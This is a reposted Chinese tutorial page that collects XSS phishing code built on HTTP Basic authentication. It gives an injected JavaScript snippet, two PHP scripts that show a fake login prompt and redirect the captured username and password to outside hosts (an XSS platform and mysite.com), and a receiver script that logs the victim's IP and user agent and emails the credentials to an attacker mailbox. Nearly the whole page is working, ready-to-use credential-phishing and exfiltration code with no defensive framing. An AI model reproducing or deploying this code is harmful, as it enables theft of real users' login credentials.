當前位置：首頁 > 编程资源 > 编程问答 >内容正文

编程问答

xss基础认证钓鱼代码收集

發布時間：2024/1/8 编程问答 31 豆豆

生活随笔收集整理的這篇文章主要介紹了 xss基础认证钓鱼代码收集小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

0x01

下面這個只是一個簡單的要求輸入用戶-密碼的彈框

<?php error_reporting(0); /* 檢查變量 $PHP_AUTH_USER 和$PHP_AUTH_PW 的值*/ if ((!isset($_SERVER['PHP_AUTH_USER'])) || (!isset($_SERVER['PHP_AUTH_PW']))) { /* 空值：發送產生顯示文本框的數據頭部*/ header('WWW-Authenticate: Basic realm="'.addslashes(trim($_GET['info'])).'"'); header('HTTP/1.0 401 Unauthorized'); echo 'Authorization Required.'; exit; } else if ((isset($_SERVER['PHP_AUTH_USER'])) && (isset($_SERVER['PHP_AUTH_PW']))){ /* 變量值存在，檢查其是否正確 */ header("Location: http://lennyxss.sinaapp.com/index.php?do=api&id={$_GET[id]}&username={$_SERVER[PHP_AUTH_USER]}&password={$_SERVER[PHP_AUTH_PW]}"); } ?>

0x02

之前一直在想怎么引入自己寫的php文件，又不能上傳到受害者的服務器上，結果沒想到可以使用圖片的src屬性引入，那就很好辦了，就是插入這么一段惡意代碼：

x=new Image(); x.src="http://mysite.com/auth.php";

這里的auth.php就是我們偽造的惡意文件，這個文件的功能就是實現彈框

auth.php代碼如下：

<?php if($_SERVER['PHP_AUTH_PW'] =="" || $_SERVER['PHP_AUTH_USER'] =="" ) { header('WWW-Authenticate: Basic realm="Basic Auth"'); header('HTTP/1.0 401 Unauthorized'); } else{ $user = $_SERVER['PHP_AUTH_USER']; $pass = $_SERVER['PHP_AUTH_PW']; $fish = "username:".$user." password:".$pass; header("location:http://mysite.com/x.php?c=$fish"); } ?>

這段代碼中的header()函數就是實現一個重定向功能，并以get方式帶上我們釣到的用戶名以及密碼，重定向的目標地址就是我們接下來要介紹的接收端，接收端代碼如下：

<?php $ip = $_SERVER['REMOTE_ADDR']; $referer = $_SERVER['HTTP_REFERER']; $agent = $_SERVER['HTTP_USER_AGENT']; $data = $_GET[c]; $time = date("Y-m-d G:i:s A"); $text = " ".$time." = ".$ip." User Agent: ".$agent." Referer: ".$referer." Session: ".$data." "; require("class.phpmailer.php"); $mail = new PHPMailer(); $mail->CharSet = "UTF-8"; $address ="xssget@qq.com";//接收郵箱地址 $mail->IsSMTP(); // 使用SMTP方式發送 $mail->Host = "smtp.163.com"; // 您的郵箱域名 $mail->SMTPAuth = true; // 啟用SMTP驗證功能 $mail->Username = "xsssend@163.com"; // 郵局用戶名(請填寫完整的email地址) $mail->Password = "mailpwd"; // 郵局密碼 $mail->Port=25; $mail->From = "xsssend@163.com"; //郵件發送者email地址 $mail->FromName = "Bemo-XSS success!"; $mail->AddAddress("$address", "a"); $mail->IsHTML(true); //是否使用HTML格式 $mail->Subject = "Bemo-XSS success!"; //郵件標題 $mail->Body = $text; //郵件內容，上面設置HTML，則可以是HTML if(!$mail->Send()) { echo "郵件發送失敗. "; echo "錯誤原因: " . $mail->ErrorInfo; exit; } ?>

上面的代碼就是把我們接收到的數據直接發送到攻擊者的郵箱（郵箱自行修改）

總結

以上是生活随笔為你收集整理的xss基础认证钓鱼代码收集的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。

上一篇： [Linux命令] Cat是一只可爱的猫
下一篇： Django新手入门教程（2）测试服务器